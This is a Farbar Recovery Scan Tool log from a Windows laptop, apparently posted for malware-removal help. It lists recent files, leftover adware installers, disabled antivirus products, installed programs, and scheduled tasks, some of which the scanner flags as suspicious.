2014-11-12 14:20 - 2014-08-21 06:52 - 00000376 _____ () C:\WINDOWS\Tasks\CIMT_S-1-5-21-638231278-2563524819-3576094203-1001.job
2014-11-12 14:19 - 2014-02-08 18:08 - 00003596 _____ () C:\WINDOWS\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-638231278-2563524819-3576094203-1001
2014-11-12 14:17 - 2014-02-11 19:18 - 02015220 _____ () C:\WINDOWS\WindowsUpdate.log
2014-11-12 14:17 - 2012-07-26 02:59 - 00000000 ____D () C:\WINDOWS\CbsTemp
2014-11-12 14:16 - 2013-11-17 00:06 - 00000000 ____D () C:\Program Files (x86)\Dell Backup and Recovery
2014-11-12 14:15 - 2014-05-27 20:21 - 00000000 ____D () C:\Users\Nick\AppData\Roaming\Skype
2014-11-12 14:14 - 2014-09-04 16:02 - 00000920 _____ () C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2014-11-12 14:14 - 2014-05-01 19:55 - 00000000 ___RD () C:\Users\Nick\OneDrive
2014-11-12 14:13 - 2014-08-21 20:03 - 00194722 _____ () C:\WINDOWS\PFRO.log
2014-11-12 14:13 - 2013-08-22 09:45 - 00000006 ____H () C:\WINDOWS\Tasks\SA.DAT
2014-11-12 14:13 - 2013-08-22 08:25 - 00524288 ___SH () C:\WINDOWS\system32\config\BBI
2014-11-12 14:12 - 2014-09-04 16:02 - 00000924 _____ () C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2014-11-12 14:11 - 2014-09-28 11:23 - 00000000 ____D () C:\AdwCleaner
2014-11-12 14:00 - 2013-08-22 10:36 - 00000000 ____D () C:\WINDOWS\system32\sru
2014-11-12 13:58 - 2014-08-20 10:29 - 00000000 ____D () C:\Users\Nick\Desktop\Spyware Removers
2014-11-12 13:52 - 2013-08-22 10:36 - 00000000 ____D () C:\WINDOWS\system32\NDF
2014-11-12 13:49 - 2013-11-14 02:28 - 00865408 _____ () C:\WINDOWS\system32\PerfStringBackup.INI
2014-11-12 13:48 - 2014-02-09 20:11 - 00000830 _____ () C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2014-11-12 13:41 - 2014-08-19 21:31 - 00000258 __RSH () C:\ProgramData\ntuser.pol
2014-11-12 12:54 - 2014-06-26 09:49 - 00000942 _____ () C:\WINDOWS\Tasks\FacebookUpdateTaskUserS-1-5-21-638231278-2563524819-3576094203-1001UA.job
2014-11-12 12:29 - 2014-02-22 13:43 - 00003922 _____ () C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{54E16319-ADF2-46EB-9192-E217F01E60DE}
2014-11-11 14:48 - 2014-02-09 20:11 - 00003718 _____ () C:\WINDOWS\System32\Tasks\Adobe Flash Player Updater
2014-11-11 14:41 - 2014-08-13 02:47 - 00000000 ____D () C:\Users\Nick\AppData\Roaming\Open Download Manager
2014-11-11 14:41 - 2014-08-13 02:45 - 00000000 ____D () C:\Program Files (x86)\OpenDownloaderManager
2014-11-11 14:40 - 2014-03-06 23:30 - 00000000 ____D () C:\Users\Nick\AppData\Local\Deployment
2014-11-11 14:39 - 2014-05-17 20:35 - 00000000 ____D () C:\Program Files (x86)\OBS
2014-11-11 14:37 - 2014-09-23 15:18 - 00000000 ____D () C:\Users\Nick\AppData\Roaming\ISpeedPC
2014-11-11 14:32 - 2013-08-22 10:36 - 00000000 ____D () C:\WINDOWS\ADFS
2014-11-11 14:01 - 2014-09-23 15:18 - 00003892 _____ () C:\WINDOWS\System32\Tasks\ISpeedPC_Daily
2014-11-11 14:01 - 2014-08-20 10:19 - 00129752 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2014-11-11 14:01 - 2014-08-20 10:18 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-11-11 14:01 - 2014-08-20 10:18 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-11-10 06:22 - 2013-08-22 10:36 - 00000000 ____D () C:\WINDOWS\AppReadiness
2014-11-09 09:54 - 2014-06-26 09:49 - 00000920 _____ () C:\WINDOWS\Tasks\FacebookUpdateTaskUserS-1-5-21-638231278-2563524819-3576094203-1001Core.job
2014-11-08 16:58 - 2013-08-22 08:25 - 00262144 ___SH () C:\WINDOWS\system32\config\ELAM
2014-10-28 18:48 - 2014-09-04 16:40 - 00000000 ____D () C:\Users\Nick\Desktop\EGC_Library
2014-10-24 19:15 - 2014-08-12 22:12 - 00000000 ____D () C:\Users\Nick\AppData\Roaming\.minecraft
2014-10-23 18:33 - 2014-05-27 20:21 - 00002531 _____ () C:\Users\Nick\Desktop\Skype.lnk
2014-10-23 18:33 - 2014-05-27 20:21 - 00000000 ___RD () C:\Program Files (x86)\Skype
2014-10-23 18:33 - 2014-05-27 20:21 - 00000000 ____D () C:\ProgramData\Skype
2014-10-23 18:26 - 2014-05-29 21:38 - 00000000 ____D () C:\ProgramData\34BE82C4-E596-4e99-A191-52C6199EBF69
2014-10-23 18:26 - 2014-03-06 23:35 - 00000000 ____D () C:\Program Files\Common Files\Apple
2014-10-19 01:07 - 2014-09-04 16:02 - 00003896 _____ () C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
2014-10-19 01:07 - 2014-09-04 16:02 - 00003660 _____ () C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
2014-10-17 22:43 - 2013-08-22 10:36 - 00000000 ____D () C:\WINDOWS\rescache
2014-10-17 20:16 - 2014-07-10 14:44 - 00002457 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader XI.lnk
2014-10-17 20:08 - 2013-08-22 09:44 - 00377256 _____ () C:\WINDOWS\system32\FNTCACHE.DAT
2014-10-17 20:04 - 2013-08-22 10:36 - 00000000 ___RD () C:\WINDOWS\ToastData
2014-10-17 20:04 - 2013-08-22 10:36 - 00000000 ____D () C:\WINDOWS\WinStore
2014-10-17 20:04 - 2013-08-22 10:36 - 00000000 ____D () C:\WINDOWS\MediaViewer
2014-10-17 20:04 - 2013-08-22 10:36 - 00000000 ____D () C:\WINDOWS\FileManager
2014-10-17 20:04 - 2013-08-22 10:36 - 00000000 ____D () C:\WINDOWS\Camera
2014-10-15 19:34 - 2014-02-10 18:04 - 00000000 ____D () C:\WINDOWS\system32\MRT
2014-10-15 19:26 - 2014-02-10 18:04 - 103265616 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2014-10-15 19:24 - 2014-07-12 21:43 - 00000000 ___SD () C:\WINDOWS\system32\CompatTel

Some content of TEMP:
====================
C:\Users\Nick\AppData\Local\Temp\1406213367_rcpsetup_s32_s32.exe
C:\Users\Nick\AppData\Local\Temp\8DC4_HiDefMedia-1.1.12-win32C.exe
C:\Users\Nick\AppData\Local\Temp\airA60F.exe
C:\Users\Nick\AppData\Local\Temp\airEB19.exe
C:\Users\Nick\AppData\Local\Temp\APNSetup.exe
C:\Users\Nick\AppData\Local\Temp\bs.exe
C:\Users\Nick\AppData\Local\Temp\CloudBackup6040.exe
C:\Users\Nick\AppData\Local\Temp\Compete_setup.exe
C:\Users\Nick\AppData\Local\Temp\ConsumerInputSetup.exe
C:\Users\Nick\AppData\Local\Temp\ICReinstall_winzip18-mediafire.exe
C:\Users\Nick\AppData\Local\Temp\LSRStub.exe
C:\Users\Nick\AppData\Local\Temp\optprosetup.exe
C:\Users\Nick\AppData\Local\Temp\PCloudCleanerUpdater.exe
C:\Users\Nick\AppData\Local\Temp\post2.dll
C:\Users\Nick\AppData\Local\Temp\post2.exe
C:\Users\Nick\AppData\Local\Temp\Quarantine.exe
C:\Users\Nick\AppData\Local\Temp\setup_ex.exe
C:\Users\Nick\AppData\Local\Temp\sqlite3.dll
C:\Users\Nick\AppData\Local\Temp\tu17p84.exe
C:\Users\Nick\AppData\Local\Temp\updateb.exe
C:\Users\Nick\AppData\Local\Temp\update_553382_setup.exe
C:\Users\Nick\AppData\Local\Temp\update_589266_setup.exe
C:\Users\Nick\AppData\Local\Temp\update_657797_setup.exe
C:\Users\Nick\AppData\Local\Temp\update_784910_setup.exe
C:\Users\Nick\AppData\Local\Temp\update_794913_setup.exe
C:\Users\Nick\AppData\Local\Temp\vcredist_x64.exe

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2014-11-01 19:05

==================== End Of Log ============================

 

 

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 10-11-2014
Ran by Nick at 2014-11-12 14:20:40
Running from C:\Users\Nick\Desktop
Boot Mode: Normal
==========================================================

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: McAfee Anti-Virus and Anti-Spyware (Disabled - Up to date) {ADA629C7-7F48-5689-624A-3B76997E0892}
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: McAfee Anti-Virus and Anti-Spyware (Disabled - Out of date) {16C7C823-5972-5907-58FA-0004E2F9422F}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: McAfee Firewall (Disabled) {959DA8E2-3527-57D1-4915-924367AD4FE9}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe Flash Player 15 Plugin (HKLM-x32\...\Adobe Flash Player Plugin) (Version: 15.0.0.223 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.09) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.09 - Adobe Systems Incorporated)
Apple Application Support (HKLM-x32\...\{83CAF0DE-8D3B-4C37-A631-2B8F16EC3031}) (Version: 3.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{BDD99690-3541-4619-9D2A-3CDDB3E15F9E}) (Version: 8.0.5.6 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Consumer Input Update Helper (x32 Version: 1.3.25.149 - Compete Inc.) Hidden
CryptoPrevent (HKLM-x32\...\{5C5B24E7-4694-4049-A222-CCE7D3FAC63F}_is1) (Version:  - Foolish IT LLC)
CyberLink Media Suite Essentials (HKLM-x32\...\InstallShield_{8F14AA37-5193-4A14-BD5B-BDF9B361AEF7}) (Version: 10.0 - CyberLink Corp.)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Dell Backup and Recovery - Support Software (HKLM-x32\...\{A9668246-FB70-4103-A1E3-66C9BC2EFB49}) (Version: 1.5.0.0 - Dell Inc.)
Dell Backup and Recovery (HKLM-x32\...\{0ED7EE95-6A97-47AA-AD73-152C08A15B04}) (Version: 1.5.0.0 - Dell Inc.)
Dell Touchpad (HKLM\...\SynTPDeinstKey) (Version: 16.3.7.0 - Synaptics Incorporated)
Dell WLAN and Bluetooth Client Installation (HKLM-x32\...\{28006915-2739-4EBE-B5E8-49B25D32EB33}) (Version: 10.0 - Dell Inc.)
DSC/AA Factory Installer (Version: 3.4.6299.48 - PC-Doctor, Inc.) Hidden
Elgato Game Capture HD (HKLM-x32\...\{BB6E10AB-CB79-463F-9548-B7DCEDC3BF28}) (Version: 1.42.24.539 - Elgato Systems GmbH)
Facebook Video Calling 3.1.0.521 (HKLM-x32\...\{2091F234-EB58-4B80-8C96-8EB78C808CF7}) (Version: 3.1.521 - Skype Limited)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 38.0.2125.111 - Google Inc.)
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.1.0.1252 - Intel Corporation)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3379 - Intel Corporation)
Intel® Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 11.7.0.1013 - Intel Corporation)
Itibiti RTC (x32 Version: 0.0.1 - Itibiti Inc) Hidden
iTunes (HKLM\...\{2ABBBD91-91E5-4AD7-929A-FE15D1DC0576}) (Version: 12.0.1.26 - Apple Inc.)
Java 7 Update 45 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83217045F0}) (Version: 7.0.450 - Oracle)
Java 7 Update 67 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F03217067FF}) (Version: 7.0.670 - Oracle)
Malwarebytes Anti-Malware version 2.0.3.1025 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.3.1025 - Malwarebytes Corporation)
McAfee LiveSafe – Internet Security (HKLM-x32\...\MSC) (Version: 12.8.934 - McAfee, Inc.)
McAfee Security Scan Plus (HKLM\...\McAfee Security Scan) (Version: 3.8.150.1 - McAfee, Inc.)
Microsoft Office (HKLM-x32\...\{90150000-0138-0409-0000-0000000FF1CE}) (Version: 15.0.4454.1510 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Movie Maker (x32 Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
Mozilla Firefox 32.0.3 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 32.0.3 (x86 en-US)) (Version: 32.0.3 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 29.0.1 - Mozilla)
MSVCRT110_amd64 (Version: 16.4.1109.0912 - Microsoft) Hidden
My Dell (HKLM\...\PC-Doctor for Windows) (Version: 3.5.6426.22 - PC-Doctor, Inc.)
Panda Cloud Cleaner (HKLM-x32\...\{92B2B132-C7F0-43DC-921A-4493C04F78A4}_is1) (Version: 1.0.107 - Panda Security)
Photo Common (x32 Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
Photo Gallery (x32 Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
Qualcomm Atheros Bluetooth Suite (64) (HKLM\...\{A84A4FB1-D703-48DB-89E0-68B6499D2801}) (Version: 8.0.0.218 - Qualcomm Atheros Communications)
Quickset64 (HKLM\...\{87CF757E-C1F1-4D22-865C-00C6950B5258}) (Version: 10.15.018 - Dell Inc.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6959 - Realtek Semiconductor Corp.)
Realtek USB 2.0 Card Reader (HKLM-x32\...\{96AE7E41-E34E-47D0-AC07-1091A8127911}) (Version: 6.1.8400.39030 - Realtek Semiconductor Corp.)
Shared C Run-time for x64 (HKLM\...\{EF79C448-6946-4D71-8134-03407888C054}) (Version: 10.0.0 - McAfee)
Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 7.3.16540.9015 - Microsoft Corporation)
Skype™ 6.21 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 6.21.104 - Skype Technologies S.A.)
Spotify (HKU\S-1-5-21-638231278-2563524819-3576094203-1001\...\Spotify) (Version: 0.9.14.13.gba5645ad - Spotify AB)
TomTom HOME (HKLM-x32\...\{99072AB4-D795-44D5-9D65-E3C9F8322C97}) (Version: 2.9.7 - TomTom)
TomTom HOME Visual Studio Merge Modules (HKLM-x32\...\{8F3C31C5-9C3A-4AA8-8EFA-71290A7AD533}) (Version: 1.0.2 - TomTom International B.V.)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3505.0912 - Microsoft Corporation)

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

==================== Restore Points  =========================

24-10-2014 20:34:27 Scheduled Checkpoint
02-11-2014 00:17:19 Scheduled Checkpoint
09-11-2014 01:27:02 Scheduled Checkpoint
11-11-2014 19:35:18 Removed iSpeedPC

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2013-08-22 08:25 - 2013-08-22 08:25 - 00000824 ____A C:\WINDOWS\system32\Drivers\etc\hosts

==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

Task: {224F9424-7C34-41D7-B2E1-8D302EF2221D} - System32\Tasks\Microsoft\Windows\Multimedia\SMupdate3 => Rundll32.exe C:\PROGRA~1\COMMON~1\System\SysMenu.dll ,Command701 update3 <==== ATTENTION
Task: {2AAD946D-AC7D-4CF9-852A-7DA8AF8C0FB7} - System32\Tasks\ISpeedPC_LogOn => C:\Program Files (x86)\iSpeedPC\ISpeedPC.exe
Task: {2E7362E2-7D73-4163-9075-A4DF3580F86A} - System32\Tasks\CLVDLauncher => C:\Program Files (x86)\CyberLink\Power2Go8\CLVDLauncher.exe [2012-12-03] (CyberLink Corp.)
Task: {46217474-8064-4265-A4A0-002D264F817E} - System32\Tasks\CLMLSvc_P2G8 => C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe [2012-12-03] (CyberLink)
Task: {4EDF987C-D75F-4C07-A287-635A1A1108B8} - \f0ca9306-e03d-4628-913b-65aa86c909c3-4 No Task File <==== ATTENTION
Task: {57D4CD06-1F26-4446-BDE4-7DFB76BFD78D} - System32\Tasks\PCDEventLauncherTask => C:\Program Files\My Dell\sessionchecker.exe [2014-01-31] (PC-Doctor, Inc.)
Task: {6CC09012-A747-4959-8588-14BAB0BE6320} - System32\Tasks\Microsoft\Windows\Maintenance\SMupdate2 => Rundll32.exe C:\PROGRA~1\COMMON~1\System\SysMenu.dll ,Command701 update2 <==== ATTENTION
Task: {76F2B453-E3B6-4E38-8066-FCC61F4EAC85} - System32\Tasks\SystemToolsDailyTest => uaclauncher.exe
Task: {7C442A85-24B8-4D6E-92B2-272C3D018609} - System32\Tasks\Synaptics TouchPad Enhancements => \Program Files\Synaptics\SynTP\SynTPEnh.exe [2012-12-21] (Synaptics Incorporated)
Task: {7C59F4C2-41D5-4A06-A579-36A44EBA8E71} - System32\Tasks\ISpeedPC_Daily => C:\Program Files (x86)\iSpeedPC\ISpeedPC.exe
Task: {851F731A-BF48-4075-A4B0-7B9C1849863E} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-09-04] (Google Inc.)
Task: {A4FB5EFF-BF29-4D63-85CC-3BD219A83B12} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-09-04] (Google Inc.)
Task: {AB3799B0-0FA8-4119-BFB8-0DDD71126112} - System32\Tasks\CIMT_S-1-5-21-638231278-2563524819-3576094203-1001 => C:\Program Files (x86)\Consumer Input\Monitoring\dca-monitoring.exe
Task: {B328552A-72D7-424D-84D8-9584ECEBFA78} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-11-11] (Adobe Systems Incorporated)
Task: {BA82CF48-4E3F-4293-BA6E-0B6736D39132} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {D98B2A17-94FA-4CFC-9B9B-C37D1D6FCA5B} - System32\Tasks\FacebookUpdateTaskUserS-1-5-21-638231278-2563524819-3576094203-1001UA => C:\Users\Nick\AppData\Local\Facebook\Update\FacebookUpdate.exe [2014-06-26] (Facebook Inc.)
Task: {DF885BAF-FEA3-43BA-ACFD-A5C75611568D} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2014-10-15] (Microsoft Corporation)
Task: {DFBD4376-7341-44C1-A473-883CB3732D02} - System32\Tasks\FacebookUpdateTaskUserS-1-5-21-638231278-2563524819-3576094203-1001Core => C:\Users\Nick\AppData\Local\Facebook\Update\FacebookUpdate.exe [2014-06-26] (Facebook Inc.)
Task: {FC38D89D-0110-47DD-8407-39490C9A78AC} - System32\Tasks\PCDoctorBackgroundMonitorTask => C:\Program Files\My Dell\uaclauncher.exe [2014-01-31] (PC-Doctor, Inc.)
Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\WINDOWS\Tasks\CIMT_S-1-5-21-638231278-2563524819-3576094203-1001.job => C:\Program Files (x86)\Consumer Input\Monitoring\dca-monitoring.exe
Task: C:\WINDOWS\Tasks\FacebookUpdateTaskUserS-1-5-21-638231278-2563524819-3576094203-1001Core.job => C:\Users\Nick\AppData\Local\Facebook\Update\FacebookUpdate.exe
Task: C:\WINDOWS\Tasks\FacebookUpdateTaskUserS-1-5-21-638231278-2563524819-3576094203-1001UA.job => C:\Users\Nick\AppData\Local\Facebook\Update\FacebookUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\Synaptics TouchPad Enhancements.job => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe

==================== Loaded Modules (whitelisted) =============

2013-11-17 00:04 - 2012-04-24 21:43 - 00254512 ____N () C:\Program Files (x86)\CyberLink\Shared files\RichVideo.exe
2013-11-17 00:07 - 2013-04-19 18:51 - 00020256 _____ () C:\Program Files (x86)\Dell Backup and Recovery\Components\Shell\DBROverlayIcon.dll
2013-11-17 00:07 - 2013-04-19 18:52 - 00049440 _____ () C:\Program Files (x86)\Dell Backup and Recovery\Components\Shell\STCommonShellIntegration.dll
2013-11-17 00:07 - 2013-04-19 18:51 - 00019232 _____ () C:\Program Files (x86)\Dell Backup and Recovery\Components\Shell\DBROverlayNotBackuped.dll
2013-11-17 00:07 - 2013-04-19 18:51 - 00034080 _____ () C:\Program Files (x86)\Dell Backup and Recovery\Components\Shell\DBRShellExtension.dll
2014-09-10 14:15 - 2014-09-10 14:15 - 00183296 _____ () C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20605_x64__8wekyb3d8bbwe\ErrorReporting.dll
2012-12-28 16:39 - 2012-12-28 16:39 - 00011264 _____ () C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\Modules\ActivateDesktopDebugger\ActivateDesktopDebugger.dll
2012-12-28 16:36 - 2012-12-28 16:36 - 00084480 _____ () C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\Modules\Map\MAP.dll
2012-12-28 16:41 - 2012-12-28 16:41 - 00012928 _____ () C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\ActivateDesktop.exe
2014-02-12 21:58 - 2014-02-12 21:58 - 00073544 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2014-10-11 12:05 - 2014-10-11 12:05 - 01044776 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2013-11-17 00:02 - 2012-06-07 22:34 - 00627216 _____ () C:\Program Files (x86)\CyberLink\Power2Go8\CLMediaLibrary.dll
2012-06-08 14:34 - 2012-06-08 14:34 - 00016400 _____ () C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvcPS.dll
2014-10-18 21:00 - 2014-10-18 21:00 - 00016384 _____ () C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\PSIClient\2133a50009fa3b357bfbd29a218be0f6\PSIClient.ni.dll
2013-11-16 23:53 - 2012-06-25 13:41 - 01198912 _____ () C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\ACE.dll

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)

AlternateDataStreams: C:\Users\Nick\OneDrive:ms-properties
AlternateDataStreams: C:\Users\Nick\SkyDrive:ms-properties

==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MCODS => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefire => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfevtp => ""="Driver"

==================== EXE Association (whitelisted) =============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)

==================== MSCONFIG/TASK MANAGER disabled items =========

(Currently there is no automatic fix for this section.)

HKLM\...\StartupApproved\Run: => "BtPreLoad"
HKLM\...\StartupApproved\Run: => "QuickSet"
HKLM\...\StartupApproved\Run: => "SpywareClearUpdater"
HKLM\...\StartupApproved\Run: => "SpywareClearShield"
HKLM\...\StartupApproved\Run32: => "RemoteControl10"
HKCU\...\StartupApproved\Run: => "TomTomHOME.exe"

========================= Accounts: ==========================

Administrator (S-1-5-21-638231278-2563524819-3576094203-500 - Administrator - Disabled)
Guest (S-1-5-21-638231278-2563524819-3576094203-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-638231278-2563524819-3576094203-1005 - Limited - Enabled)
Nick (S-1-5-21-638231278-2563524819-3576094203-1001 - Administrator - Enabled) => C:\Users\Nick

==================== Faulty Device Manager Devices =============

Name: Bluetooth Audio Device
Description: Bluetooth Audio Device
Class Guid: {4d36e96c-e325-11ce-bfc1-08002be10318}
Manufacturer: Qualcomm Atheros Communications
Service: BTATH_A2DP
Problem: : This device cannot start. (Code10)
Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device.
On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.

Name: Virtual Bluetooth Support (Include Audio)
Description: Virtual Bluetooth Support (Include Audio)
Class Guid: {c7c038ad-1f2d-44d4-b2fe-d912be20e6d5}
Manufacturer: Qualcomm Atheros Communications
Service: AthBTPort
Problem: : This device is not working properly because Windows cannot load the drivers required for this device. (Code 31)
Resolution: Update the driver

Name: Bluetooth LWFLT Device
Description: Bluetooth LWFLT Device
Class Guid: {c7c038ad-1f2d-44d4-b2fe-d912be20e6d5}
Manufacturer: Qualcomm Atheros Communications
Service: BTATH_LWFLT
Problem: : This device is not working properly because Windows cannot load the drivers required for this device. (Code 31)
Resolution: Update the driver

==================== Event log errors: =========================

Application errors:
==================
Error: (11/12/2014 02:12:02 PM) (Source: MsiInstaller) (EventID: 11316) (User: NT AUTHORITY)
Description: Product: Google Update Helper -- Error 1316. The specified account already exists.

Error: (11/12/2014 01:54:23 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program LiveComm.exe version 17.5.9600.20605 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

Process ID: 1084

Start Time: 01cffea8a4ead6b7

Termination Time: 4294967295

Application Path: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20605_x64__8wekyb3d8bbwe\LiveComm.exe

Report Id: 4e57a951-6a9d-11e4-8288-645a04a55516

